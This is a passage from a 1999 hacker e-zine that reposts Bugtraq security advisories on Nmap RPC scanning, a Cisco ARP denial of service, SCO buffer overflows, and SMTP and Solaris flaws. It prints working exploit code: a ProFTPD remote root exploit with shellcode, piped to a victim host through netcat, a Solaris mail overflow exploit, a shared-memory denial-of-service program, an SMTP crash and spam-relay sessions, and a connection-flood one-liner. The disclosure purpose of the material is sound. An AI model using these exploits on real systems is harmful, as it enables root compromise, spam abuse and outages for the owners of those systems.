= fork(); if (pid<0) { perror("fork"); break; } else j++; if (!pid) break; } if (!pid) { pause(); pid = getpid(); srand(pid*10); fprintf(stderr, "[%d] child %d: Here I go!\n", pid, i); sprintf(filename, "%s%d", argv[1], pid); for(i=0;i<nbopen;i++) { f = open(filename, O_CREAT|O_RDWR, 0666); if (f<0) { fprintf(stderr, "[%d] file %s ", pid, filename); perror("open"); break; } k = (rand() % (tfichier * 1024)); j = lseek(f, k, SEEK_SET); if (j!=k) { fprintf(stderr, "[%d] ", pid); perror("lseek"); break; } // read(f, bloc, tbloc*1024); if (write(f, bloc, tbloc*1024)!=tbloc*1024) { fprintf(stderr, "[%d] ", pid); perror("write"); break; } sync(); if (close(f)) { fprintf(stderr, "[%d] ", pid); perror("close"); break; } } exit(0); } sleep(2); gettimeofday(&start, NULL); kill(0, SIGUSR1); i = 0; while (i<nbfils) if (waitpid(-1, NULL, 0)>0) i++; fprintf(stderr, "they're all dead now, exiting.\nYour system is not vulnerable\n"); gettimeofday(&end, NULL); delay = end.tv_sec - start.tv_sec + ((float) (end.tv_usec - start.tv_usec)) / (float) 1000000; i = nbopen * tbloc * nbfils; exit(0); } @HWA 61.0 Using Nmap for RPC vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Subject: Re: CERT Summary CS-99-03 To: BUGTRAQ@SECURITYFOCUS.COM >From the CERT Summary released yesterday: > 1. RPC Vulnerabilities > We have received many reports of exploitations involving three RPC > vulnerabilties. Such exploitations can lead to root compromise on > systems that implement these RPC services. > 3. Continued Widespread Scans > We are still receiving daily reports of intruders using tools to > scan networks for multiple vulnerabilities. Intruder scanning > tools continue to become more sophisticated, Unfortunately, it is often difficult for admins to scan their networks for vulnerable RPC services since you never know for sure what ports they will be listening on. Thus I have released a version of Nmap that will query open TCP and UDP ports to determine whether they are RPC as well as their program name, number and version(s). This allows you to map all the RPC services on a given network and then upgrade or eliminate the exploitable ones. Of course you can obtain the same info from 'rpcinfo -p', but portmapper is often unavailable due to firewalls or IP restrictions (libwrap). Further, it can be painful to locate and 'rpcinfo' every host on a large network. And there are occasional cases where a vulnerable service could be running but not registered. In addition, rpcinfo won't give you the OS type, which is important in determining whether a machine is vulnerable. Nmap is available at http://www.insecure.org/nmap/ and compiles/runs on most common UNIX platforms. The latest version also contains many more OS fingerprints, speed optimizations, bug fixes, etc. Here is a quick example of how to use the new RPC functionality against a stock Solaris 7 box: amy# ./nmap -sRUS -p 7,9,13,19,21,23,25,37,42,79,111,32760-32785 xanadu Starting nmap V. 2.3BETA1 by Fyodor (fyodor@dhp.com,www.insecure.org/nmap/) Interesting ports on xanadu.yuma.net (192.168.0.10): Port State Protocol Service (RPC) 7 open udp echo (Non-RPC) 7 open tcp echo (Non-RPC) 9 open udp discard (Non-RPC) 9 open tcp discard (Non-RPC) 13 open udp daytime (Non-RPC) 13 open tcp daytime (Non-RPC) 19 open udp chargen (Non-RPC) 19 open tcp chargen (Non-RPC) 21 open tcp ftp (Non-RPC) 23 open tcp telnet (Non-RPC) 25 open tcp smtp (Non-RPC) 37 open udp time (Non-RPC) 37 open tcp time (Non-RPC) 42 open udp nameserver (Non-RPC) 79 open tcp finger (Non-RPC) 111 open udp sunrpc (portmapper V2-4) 111 open tcp sunrpc (portmapper V2-4) 32771 open udp (Non-RPC) 32771 open tcp (status V1) 32772 open udp (status V1) 32772 open tcp (Non-RPC) 32773 open udp (sadmind V10) 32773 open tcp (ttdbserverd V1) 32774 open udp (rquotad V1) 32774 open tcp (Non-RPC) 32775 open udp (rusersd V2-3) 32775 open tcp (cachefsd V1) 32776 open udp (sprayd V1) 32776 open tcp (Non-RPC) 32777 open udp (walld V1) 32777 open tcp (cmsd V2-5) 32778 open udp (rstatd V2-4) 32779 open udp (cmsd V2-5) Nmap run completed -- 1 IP address (1 host up) scanned in 30 seconds amy# Cheers, Fyodor -- Fyodor 'finger pgp@pgp.insecure.org | pgp -fka' "The percentage of users running Windows NT Workstation 4.0 whose PCs stopped working more than once a month was less than half that of Windows 95 users."-- microsoft.com/ntworkstation/overview/Reliability/Highest.asp @HWA 62.0 Clarification of the Nmap/Cisco DoS problem ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From: "Lancashire, Andrew" <LancashireA@sutterhealth.org> This is to clarify what is being put out by Cisco and what we are being told by Cisco. Two e-mails below is what Cisco is telling us and makes alot more sense than what Cisco is telling Bugtraq. The last post to Bugtraq made mention that the arp cache was filling up and allocating memory for both reachable hosts and unreachable hosts (incompletes). Although what Lisa describes is true regarding the arp cache, it would not be true for our or most other sane persons environment. Since routers will only arp for what is local, that would mean that for the arp cache to fill up and us all the memory all networks in the 10.x.x.x range would need to be local. So that's not gonna happen but if you read the e-mail below that from Kenny (also at Cisco ) his explanation makes allot more sense considering we have hundreds of routers. Thank You Andrew P.S. Congratulations on the re-opening of PacketStorm ___________________________________ Subject: Re: Cisco and Nmap Dos To: BUGTRAQ@SECURITYFOCUS.COM Hi all, I wanted to address the items listed here. We are still investigating this problem, and hope to have more information later on in the week. Item 1, OSPF is not an issue. According to the configuration information provided to us by the customer, OSPF is not in use. Items 2, 3 & 4. IOS actually handles ARP in the following manner: When we receive a packet destined for something not already in our ARP table, we enter an "incomplete" entry in the ARP table. Then we will rate limit ARPs to once every 2 seconds to that destination. Any additional packets to that same destination will be dropped until the ARP entry is completed. This is on a per destination basis. "Incompletes" (ARP requests that have not been responded to) get dropped after approximately 1 minute from the last time we sent an ARP request for that non existent address. Incomplete entries MAY stay around longer, as the process that is responsible for cleaning up the ARP table may not have enough time to complete before it is called again, if we have a lot to clean up, which may be relevant to this case. The incomplete entries will eventually get cleaned up, but it may take two or three minutes, two or three cycles of the process that cleans up the table. Under a dedicated, intense nmap scan, a very large number of ARP requests may be generated, causing the ARP table to grow very large with "incomplete" entries. These entries consume memory. As the amount of free memory declines and demand on the processor to handle outstanding packets increases, ARP processing falls behind and throughput on the router may decline significantly. Once the scan is stopped, processing catches up and things return to normal. So, to my knowledge IOS should be doing the right thing, we only queue one ARP request at a time, every 2 seconds, until the ARP entry is resolved, we rate limit requests, dropping all additional packets, until the ARP entry is resolved, and we clean up the outstanding incomplete requests within a few minutes. I hope that helps address some of the concerns put forth. Hopefully we will have further updates shortly. Thank you, Lisa Napier Product Security Incident Response Team Cisco Systems ___________ _______________ -----Original Message----- From: khollis [SMTP:khollis@cisco.com] Sent: Wednesday, September 15, 1999 11:31 AM To: wescotd@sutterhealth.org Subject: Regarding Case Number V44290 Hello Dave, I've done some testing here with Nmap. I was able to create a test bed that can cause problems & symptoms similar to those you reported. But in summary, the router is functioning normally & depending on the network topology the behavior you experienced would be expected. >From show processor memory, the ip input process is the process that maintains the ip fast switching cache. This fast switching cache is used when forwarding packets to avoid interrupting the cpu for repetitive route table lookups. The key issue is the behavior of the fast cache and the way it gets built. There are a number of scenarios that will cause the fast cache to install an entry that essentially looks like a host route. For instance, with only 1 path to a destination, we will install an entry into the fast cache that covers the entire network. Example: 100.0.0.0/8. However, when multiple equal cost paths to a destination exist, we will install an entry into the fast cache for each destination. Example: 100.0.0.1/32, 100.1.1.1/32, 100.2.2.2/32...and so on. This helps ensure load balancing. Additionally, depending on whether routes are directly connected, and/or subnetted, or the next hop of a static route, the results can vary. When running Nmap & scanning every address in a class A ip network, if conditions warrant the installation of a /32 entry into the fast cache this would allow the fast cache to consume a tremendous amount of memory and in that scenario all available dram could be consumed. This creates additional problems because there isn't enough memory to support other features on the router. Since Nmap isn't a normal application ran on networks, this issue isn't a concern in most networking environments. However, if this is a major concern you could run CEF (Cisco Express Forwarding). The behavior I just explained does not occur when running CEF. But you will need to run 12.0 on the Cat5 RSM. Other workarounds such as disabling fast switching (no ip route-cache) or using max-paths 1 aren't really feasible. CEF is the better solution. Thanks, KennyH. _________________ @HWA 63.0 19 SCO 5.0.5+Skunware98 buffer overflows ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Subject: 19 SCO 5.0.5+Skunware98 buffer overflows To: BUGTRAQ@SECURITYFOCUS.COM Greetings, After some light security auditing ;) I've found approximately nineteen buffer overflows in various SCO 5.0.5+Skunkware98 programs. This was, by no means, a comprehensive audit of SCO's su/gids so I'm sure there are dozens of holes I've missed. Keep in mind also that this was ONLY command line buffer overflow testing and did not include environment, file i/o, or any other sort of overflow. And I didn't touch /tmp races. That said.. Some of these holes are old to the world of security, but apparently SCO hasn't caught up yet. For instance, anyone remember the old Xt library holes in xterm and such? Well, apparently SCO doesn't. Not to mention the fact that in June someone posted an xterm exploit (though the author didn't make clear that all programs using the Xt library were probably vulnerable) and SCO never came out with a fix. Thus this program as well as all others in the class are still vulnerable. Following is a list of vulnerable programs and their su/gid status: Potential root: SUID root --- 1. xload -bg $1492bytes 2. xterm -bg $1492bytes 3. xmcd -bg $1492bytes SUID auth (Auth has rw access to /etc/shadow) --- 4. xlock -bg $1492bytes 5. xscreensaver -bg $1492bytes 6. scolock -bg $1492bytes SUID mem (strings /dev/kmem) -- 7. sar -o $2105bytes or sar -f $1077bytes x Potential lp: SUID lp -- 8. cancel $998bytes (isn't this one old too?) 9. lp $10000bytes (didn't get the exact number) 10. reject $10000bytes (as above) Potential bin: SUID bin --- 11. sd $1017bytes (SIGSEGV @1017 SIGTERM 1 to 1017bytes) Potential annoyance: SUID dos --- 12. doscat $19031bytes 13. doscp "" x 14. dosdir "" 15. dosls "" 16. dosmkdir "" 17. dosrm "" 18. dosrmdir "" SUID uucp --- 19. ati $40bytes FIX: For most of these programs, you're going to have to suffer with some broken functionality when you remove the s-bits. The various suid root and auth won't be able to function without their su/gid status. However you could make a new group such as xusers and have these programs only executable by its members. In fact adding trusted users to the lp group is probably the best way to overcome these lp vulnerabilities as well. Hopefully this advisory will scare SCO into doing some security auditing on their own before their buggy product hits the market. In any case, be wary. Brock Tellier UNIX Systems Administrator Webley Systems www.webley.com @HWA 64.0 SDI anonymous remote exploit for proftpd ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Subject: SDI anonymous remote exploit for proftpd To: BUGTRAQ@SECURITYFOCUS.COM Hello, I've seen some discussion about the possibility of exploit the newest proftpd vulnerability without having the permission to write (STOR). Here is the proof. Unlikely the last published exploit, this one does not have tricks like buggy NOP code or something (to avoid script kiddies). /* * SDI linux remote exploit for ProFTPDpre[1,2,3] * Sekure SDI - Brazilian Information Security Team * by c0nd0r <condor@sekure.org> - Sep/99 (tudo na paz!) * * Exploit for the ProFTPD log_xfer() buffer overflow -- it will spawn a * shell owned by root. * * HOWTO: unlikely the other recent FTP vulnerability, this one doesn't * need a writeable directory. You just got to have permission to * download a file (like welcome.msg or README). Don't forget to install * our favorite network tool -- NetCat. * * Greets: jamez, bishop, bahamas, stderr, dumped, paranoia, marty(nordo), * vader, fcon, slide, corb, Soft Distortion and specially to * my sasazita! Also lots of thanks to toxyn.org, * pulhas.org, phibernet, superbofh(seti) and el8.org (duke). * #uground (brasnet), #sdi(efnet), #(phibernet). * * usage: SDIpro -p <your ip> [-f <file>] [-a <align>] [-o <offset>] * where <your ip> is your ip separated with commas (127,0,0,1) * <file> is the remote file to download * example: (./SDIpro -p 27,1,1,4 -a 2;cat) | nc www.victim.com 21 * * Values: Redhat (alignment 2 - offset 0) * Slack (alignment 0 - offset -300) * * Warning: We take no responsability for the consequences on using this * tool. DO NOT USE FOR ILICIT ACTIVITIES! * * Agradecimentos a todo o pessoal que vem acompanhando a lista brasileira * de seguranca - BOS-BR <bos-br-request@sekure.org>. * http://www.securenet.com.br - novo portal de seguranca brasileiro. */ char shellcode[] = "\x31\xdb\x89\xd8\xb0\x17\xcd\x80\xeb\x66\x5e\x89\xf3\x80\xc3\x0f\x39" "\xf3\x7c\x07\x80\x2b\x02\xfe\xcb\xeb\xf5\x31\xc0\x88\x46\x01\x88\x46" "\x08\x88\x46\x10\x8d\x5e\x07\xb0\x0c\xcd\x80\x8d\x1e\x31\xc9\xb0\x27" "\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x31\xc0\x8d\x5e\x02\xb0\x0c\xcd\x80" "\x31\xc0\x88\x46\x03\x8d\x5e\x02\xb0\x3d\xcd\x80\x89\xf3\x80\xc3\x09" "\x89\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d" "\x53\x0c\xcd\x80\x31\xc0\xfe\xc0\xcd\x80\xe8\x95\xff\xff\xff\xff\xff" "\xff\x43\x43\x30\x30\x31\x30\x30\x31\x43\x31\x64\x6b\x70\x31\x75\x6a"; #include <stdio.h> #include <unistd.h> #define TOTAL 940 int fork_port ( void); int usage ( char *arg) { printf ( "SDI remote ProFTPD exploit\n"); printf ( "usage: %s -p <local ip> -f <file > [-a <align>] [-o <offset>]\n", arg); printf ( "where <local ip> is your ip separated with comma (e.g.200,30,1,20)\n"); printf ( " <file> is any remote file available to download (eg. welcome.msg)\n"); printf ( "\nvalues: RedHAT - alignment 2 / offset 0\n"); printf ( " Slack - alignment 0 / offset -300/-200\n"); exit ( 0); } main ( int argc, char *argv[] ) { char buf[2000], port[200], file[150], *pasv=NULL, *ff; int x, y=0, offset=0, align=0, c, damn=0; long addr=0xbffff450; while ((c = getopt(argc, argv, "a:o:p:f:h")) != -1) switch (c) { case 'a': align = atoi ( optarg); break; case 'o': offset = atoi ( optarg); break; case 'p': pasv = optarg; break; case 'f': ff = optarg; break; case 'h': damn = 1; break; default: damn = 1; break; } if (damn==1) usage ( argv[0]); if (pasv) snprintf ( port, sizeof(port), "%s,5,220", pasv); else usage ( argv[0]); if (ff) snprintf ( file, sizeof(file), "%s", ff); else strcpy ( file, "welcome.msg"); if ( fork() == 0) fork_port(); addr += offset; fprintf ( stderr, "\nALIGN %d (use alignment 2 for RedHAT)\n", align); fprintf ( stderr, "OFFset %d\n", offset); fprintf ( stderr, "RET 0x%x\n", addr); fprintf ( stderr, "RETR %s\n\n", file); for ( x = 0; x < ((TOTAL+align)-strlen(shellcode)); x++) buf[x] = 0x90; for ( ; y < strlen(shellcode); y++, x++) buf[x] = shellcode[y]; for ( ; x < 1016; x+=5) { buf[x ] = (addr & 0x000000ff); buf[x+1] = (addr & 0x0000ff00) >> 8; buf[x+2] = (addr & 0x00ff0000) >> 16; buf[x+3] = (addr & 0x00ff0000) >> 16; buf[x+4] = (addr & 0xff000000) >> 24; } printf( "USER ftp\n"); sleep(1); printf ( "PASS %s\n", buf); sleep(1); printf ( "PORT %s\n", port); sleep(1); printf( "RETR %s\n", file); sleep(1); } #include <netinet/in.h> #include <netdb.h> #include <sys/types.h> #include <sys/socket.h> int fork_port ( void) { struct sockaddr_in sa; struct sockaddr_in ca; int sd, cd, lx, len=0, n=0; char outbuf[5000]; bzero ( &sa, sizeof(sa)); sa.sin_family = AF_INET; sa.sin_port = htons(1500); sd = socket ( AF_INET, SOCK_STREAM, 0); lx = bind ( sd, (struct sockaddr *) &sa, sizeof(sa)); if (lx<0) { perror("bind"); exit(0); } lx = listen ( sd, 5); if (lx<0) { perror("listen"); exit(0); } // fprintf ( stderr, "waiting for the incoming file\n"); len = sizeof(ca); cd = accept ( sd, (struct sockaddr *) &ca, &len); if ( cd <= 0) { perror("accept"); return(0); } while ( (n = read ( cd, outbuf, sizeof(outbuf))) > 0) // fprintf ( stderr, "=> %s\n", outbuf); /*only for debugging*/ if ( n > 0) fprintf ( stderr, "file received\n"); close ( sd); close ( cd); sleep(1); printf ( "uname -a; id;\n"); exit(0); } ------------------------- -condor www.sekure.org s e k u r e pgp key available at: http://condor.sekure.org/condor.asc @HWA 65.0 KKIS19990914.004b: ShareDream - shared memory - ipc vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Subject: KKIS19990914.004b: ShareDream - shared memory - ipc vulnerability To: BUGTRAQ@SECURITYFOCUS.COM ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~ ### ### ### ### ### ### ### ### ### ### ###### ###### ### ### ### ### ### ### ### ### ### ### ### S E C U R I T Y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~ KKI Security Team Cracow Commercial Internet http://www.security.kki.pl http://www.kki.pl mailto:security@security.kki.pl mailto:biuro@kki.pl ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Informations ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~ Raport title : Shared Memory DoS - IPC vulnerability (Linux abuse as example) Problem found by : Robert Pajak (shadow@security.kki.pl), probably other ppl found that first - one of them is lcamtuf, Solar Designer is probably other... Raport created by : Robert Pajak (shadow@security.kki.pl) Lukasz Luzar (lluzar@security.kki.pl) Raport published : 14 September, 1999 Raport code : KKIS.14091999.004.b Vulnerable programs : system vulnerability... Systems affected : Linux, other (?) ... Archive : http://www.security.kki.pl/advisories/ Risk level : high ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~ Useing attached program one can DoS machine even when limits are set up... This is due to fact that shared memory segments can exist without beeing bind with processes. To protect you should diable this operations, or use Solar Designer's stack patch with limits set, etc... Alan Cox has been notified... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Impact ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~ Local Denial of Services attack - simple bypassing limits... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~ /* SharedDream - (c) Shadow, KKI Security */ /* */ /* I'm not responsible for any damaged done by this proggie... */ /* It should be used only for education... */ /* To protect - use brain, Solar's patches, or whatever... */ /* This problem is because shared memory segments can exist even */ /* if they are not combined with programs! */ /* !This program will crash your machine (localy) at kernels 2.x! */ /* If you are on kernels 2.2.x with limits run it twice :) */ /* really - even when rescource limits are set! :) */ /* Probably original idea by lcamtuf */ /* heck you should told me that you found it */ /* first ;) */ /* heh - worm greetings for for Coding Style ;) */ #include <stdio.h> #include <sys/types.h> #include <sys/ipc.h> #include <sys/shm.h> #define BOLD "\033[00;04m" #define BLUE "\033[00;36m" #define STAN "\033[00;00m" void main(void) { char *p; int i = 10000000; printf("\n\n"); printf(BOLD "*)" BLUE " SharedDream"STAN" - shared memory segments abuser\n"); printf(BOLD "*)\n" STAN); printf(BOLD "*)" STAN " (c) 1999" BOLD " Shadow " STAN "(" BOLD "shadow@security.kki.pl" STAN ")\n"); printf(BOLD "*)" STAN " greetz to " BOLD " vision (yo remember me), lcamtuf, kodzak, #??? ppl, Lam3rz, daworm, Trolinka, viedzmin other folks i forgot to mention\n" STAN); printf(BOLD "*)" STAN " Now it will eat up your memory even if it seems to be limited\n"); printf(BOLD "*)" STAN " Starting..."); fflush(stdout); while (1) if (p = shmat(shmget(0, i, 0777), 0, 0)) memset( p,'\0',i); // need to touch memory somehow printf(".DoW."); fflush(stdout); } else { i--; } } exit(0); } ~~~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright (c) 1999 KKI Security Team, Poland All rights reserved. All questions please address to mailto:security@security.kki.pl ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~ @HWA 66.0 TenFour TFS SMTP 3.2 Buffer Overflow ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Subject: [SECURITY] TenFour TFS SMTP 3.2 Buffer Overflow To: BUGTRAQ@SECURITYFOCUS.COM INTRINsec Security Advisory Release Date : August 30, 1999 Software : TenFour TFS SMTP 3.2 Operating System: Windows NT 3.x / 4.x Impact : The attackers can use a misconfigured TFS SMTP for spamming and can remotely crash the TFS SMTP Gateway. Author : Christophe.Lesur@INTRINsec.com Status : TenFour is advised from this. URLs : http://www.intrinsec.com/ __ Diggest __ The TenFour TFS SMTP Release 3.2 has two vulnerabilities : A buffer overflow and, under some circumstances and due to inherent TFS architecture, it can be used for spamming. Direct results are that an attacker can remotly crash your TFS SMTP Gateway or send unsollicited mails to someone ( and TFS ADMINISTRATOR ). Tenfour is advised from this. Thanks to Roberto Correnti for his support. (http://www.tenfour.com) __ Technical Details and Exploits __ TENFOUR TFS SMTP Version 3.2 has two vulnerabilities : a buffer overflow and under some circumstances it can be used for spamming. First : Buffer Overflow. There is a major buffer overflow in TFS SMTP 3.2. When you connect to the SMTP service on port 25, you get the TFS PROMPT. After sending the 'helo' command, if you send a 'MAIL FROM' larger than 128 bytes, you will crash the SMTP service with a nice protection fault. It's basically a buffer overflow and this has been fixed in release 4.0 This is the exploit : [clesur@raptor clesur]$ telnet mailhost.victim.com 25 Trying 1.1.1.1... Connected to mailhost.victim.com. Escape character is '^]'. 220 mailhost.victim.com is ready. TFS SMTP Server ver 3.2 helo 250 mailhost.victim.com, Hello mail from:<ddddddddddddd ... lots of char ... dddddddddddddddd> Connection closed by foreign host. Second : Spamming The TFS SMTP Engine accepts any mails by default and process them in its kernel. In case of a deficient message (wrong recipient, wrong domain...) TFS SMTP is usually configured to warn sender and the TFS ADMINISTRATOR by sending a 4-line warning AND the full message. Because there is no domain check before sending the message to the TFS core, it's possible to spam someone and the TFS administrator. This is the exploit : [clesur@raptor clesur]$ telnet mailhost.tfsvictim.com 25 Trying 1.1.1.1... Connected to mailhost.tfsvictim.com. Escape character is '^]'. 220 mailhost.tfsvictim.com is ready. TFS SMTP Server ver 3.2 helo 250 mailhost.tfsvictim.com, Hello mail from:<target@victim.com> 250 Sender <target@victim.com> OK rcpt to:<target@victim.com> 250 Recipient <target@victim.com> OK data 354 Begin data transfer. End with period. from: target@victim.com to: target@victim.com <YOUR MESSAGE BODY HERE> . 250 Message accepted quit 221 Connection closed Connection closed by foreign host. The spammed user will receive this message in its mailbox. Message 22: From target@victim.com Thu Jul 29 09:49:40 1999 Delivered-To: target@victim.com From: target@victim.com Date: Thu, 29 Jul 1999 11:44:03 +0200 Subject: <No subject> MIME-version: 1.0 Content-transfer-encoding: quoted-printable #################################################### This message was not delivered to target@victim.com TFS Admin was informed with a copy of this message Sender was informed with a copy of this message #################################################### <YOUR MESSAGE BODY HERE> __ Solutions __ For theses vulnerabilities, TenFour suggests upgrading to a version greater than 4.0. __ Contacts __ -- Tenfour -- TenFour South Europe ITFamily Sarl Le Technoparc 15, rue Edouard Jeanneret 78306 Poissy Cedex France Tel: +33 1 39 22 65 15 Fax: +33 1 39 11 49 77 WWW: http://www.tenfour.fr -- INTRINsec -- INTRINsec is a computer Security company. http://www.INTRINsec.com This advisory is available in french. Cet avis est disponible en francais sur notre site. __ DISCLAMERS __ INTRINsec DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, AND PROVIDED THESES INFORMATIONS "AS IS" WITHOUT WARRANTY OF ANY KIND. INTRINsec IS NOT LIABLE FOR ANY DAMAGES WHATSOEVER EVEN IF INTRINsec HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. -- Christophe Lesur Security Consultant INTRINsec mailto:christophe.lesur@INTRINsec.com @HWA 67.0 Solaris 2.7 /usr/bin/mail exploit/buffer overflow vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Subject: Solaris 2.7 /usr/bin/mail To: BUGTRAQ@SECURITYFOCUS.COM Greetings, There is a possible buffer overflow vulnerability in Solaris 2.7's sgid mail /usr/bin/mail. The reason it's only a possibility and not a full blow exploit is that mail drops sgid privs before the overflow occurs. However as we've seen in several past posts, this is not necessarily a bulletproof method of making ones program secure. Obviously mail needs these privs to perform some function, probably opening the appropriate mail owned files to deliver mail. My guess would be that in the following usage, mail would need write (read?) access to foo's mail file. bash-2.02$ mail -m `perl -e "print 'A' x 2106"` foo . mail: ERROR signal 11 bash-2.02$ In any case, this overflow does allow execution of any command you wish as shown in the program at the end of this message. I would imagine that with some careful asm code, one would be able to exploit the specific vulnerability that may exist. Information on exactly what mail does with it's s bit would be helpful. Brock Tellier UNIX Systems Administrator Webley Systems www.webley.com --- solx86.c --- /* * Generic Solaris x86 exploit program by Brock Tellier * Shellcode by Cheez Whiz * gcc -o mailex solx86.c * /usr/bin/mail -m `./mailex 0 1985 2285` foo . <period, enter> $ <not a rootshell ;)> * Usage: ./mailex <offset> <NOPS> <BUFSIZE> * * Demonstrative program for mail vulnerability. mail apparently drops privs * before the overflow occurs so we're not going to have a sgid mail shell. * Perhaps someone could make some 'shellcode' to exploit an open file * descriptor or something (whatever the reason mail is sgid mail). */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #define BUF 10000 #define NOP 0x90 char shell[] = "\xeb\x3b\x9a\xff\xff\xff\xff\x07\xff" "\xc3\x5e\x31\xc0\x89\x46\xc1\x88\x46" "\xc6\x88\x46\x07\x89\x46\x0c\x31\xc0" "\x50\xb0\x17\xe8\xdf\xff\xff\xff\x83" "\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53" "\x8d\x1e\x89\x5e\x08\x53\xb0\x3b\xe8" "\xc8\xff\xff\xff\x83\xc4\x0c\xe8\xc8" "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73" "\x68\xff\xff\xff\xff\xff\xff\xff\xff" "\xff"; unsigned long int nop; unsigned long int esp; long int offset; char buf[BUF]; unsigned long int get_esp() { __asm__("movl %esp,%eax"); } void main (int argc, char *argv[]) { int buflen, i; if (argc > 1) offset = strtol(argv[1], NULL, 0); if (argc > 2) nop = strtoul(argv[2], NULL, 0); else nop = 285; if (argc > 3) buflen=atoi(argv[3]); else buflen=BUF; esp = get_esp(); memset(buf, NOP, buflen); memcpy(buf+nop, shell, strlen(shell)); for (i = nop+strlen(shell); i < buflen-4; i += 4) *((int *) &buf[i]) = esp+offset; for (i = 0; i < strlen(buf); i++) putchar(buf[i]); return; } --- @HWA 68.0 remote DoS against inetd and ssh ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Subject: remote DoS against inetd and ssh To: BUGTRAQ@SECURITYFOCUS.COM Hi, At the beginning i'd like to excuse all of you if it is commonly well known (hmm, i guess it is, but noone patched it ;>. Both DoS`s use something known as portfuck (e.g. `while true; do telnet host port & done`). 1. If you use it against any inetd service, inetd will shoutdown that service for about 30 minutes (i did not checked, but it seems to be about that time). 2. If you use it against sshd, you have 99% that you crash the mashine in few seconds. TESTED: sshd-1.2.26 on Debian 2.0 sshd-1.2.27 on Debian 2.1 sshd-1.2.27 on RedHat 5.2 inetd - one provided with Debian 2.0/2.1/Redhat 5.2 all above platforms are VULNURABLE to this attack COMPROMISE: Allows any user to hang many machines in the Internet (i guess that only these behind a firewall are secure ;> SOLUTION: propaply running in ulimit envirmont (like qmail does) should help and additionally in inetd remove this strange 'protection'. regards, greg AKA VanitaS *************************************************************************** * Grzegorz Stelmaszek * For my public PGP key: * mailto:greg@tenet.pl * finger:greg@tenet.pl * http://www.tenet.pl * 18 E9 5E 6D 78 F0 11 F2 ****************************** 45 CF CF 63 77 C0 A4 20 @HWA 69.0 Sun Security Bulletin #00189 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Subject: Sun Security Bulletin #00189 (fwd) To: BUGTRAQ@SECURITYFOCUS.COM -- Kis-Szabo Andras Technical University of Budapest -----------------------------/ Schonherz Zoltan Dormitory kisza@sch.bme.hu /-------------------------------3OO--->>>.Info Fingerprint = 97 D7 32 CE F9 74 5C A0 E5 F4 09 29 67 9F A8 78 ---------- Forwarded message ---------- Date: Wed, 8 Sep 1999 11:20:55 -0700 From: Sun Security Coordination Team <secure@sunsc.Eng.Sun.COM> To: CWS@sunsc.Eng.Sun.COM Subject: Sun Security Bulletin #00189 -----BEGIN PGP SIGNED MESSAGE----- ________________________________________________________________________________ Sun Microsystems, Inc. Security Bulletin Bulletin Number: #00189 Date: September 8, 1999 Cross-Ref: Title: LC_MESSAGES ________________________________________________________________________________ The information contained in this Security Bulletin is provided "AS IS." Sun makes no warranties of any kind whatsoever with respect to the information contained in this Security Bulletin. ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES, INCLUDING ANY WARRANTY OF NON-INFRINGEMENT OR IMPLIED WARRANTY OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE, ARE HEREBY DISCLAIMED AND EXCLUDED TO THE EXTENT ALLOWED BY APPLICABLE LAW. IN NO EVENT WILL SUN MICROSYSTEMS, INC. BE LIABLE FOR ANY LOST REVENUE, PROFIT OR DATA, OR FOR DIRECT, SPECIAL, INDIRECT, CONSEQUENTIAL, INCIDENTAL OR PUNITIVE DAMAGES HOWEVER CAUSED AND REGARDLESS OF ANY THEORY OF LIABILITY ARISING OUT OF THE USE OF OR INABILITY TO USE THE INFORMATION CONTAINED IN THIS SECURITY BULLETIN, EVEN IF SUN MICROSYSTEMS, INC. HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. If any of the above provisions are held to be in violation of applicable law, void, or unenforceable in any jurisdiction, then such provisions are waived to the extent necessary for this disclaimer to be otherwise enforceable in such jurisdiction. ________________________________________________________________________________ 1. Bulletin Topics Sun announces the release of patches for Solaris(tm) 7 and 2.6 (SunOS(tm) 5.7 and 5.6) which relate to a buffer overflow vulnerability involving the LC_MESSAGES environment variable. Sun recommends that you install the patches listed in section 4 immediately on systems running SunOS 5.7 and 5.6. 2. Who is Affected Vulnerable: SunOS 5.7, 5.7_x86, 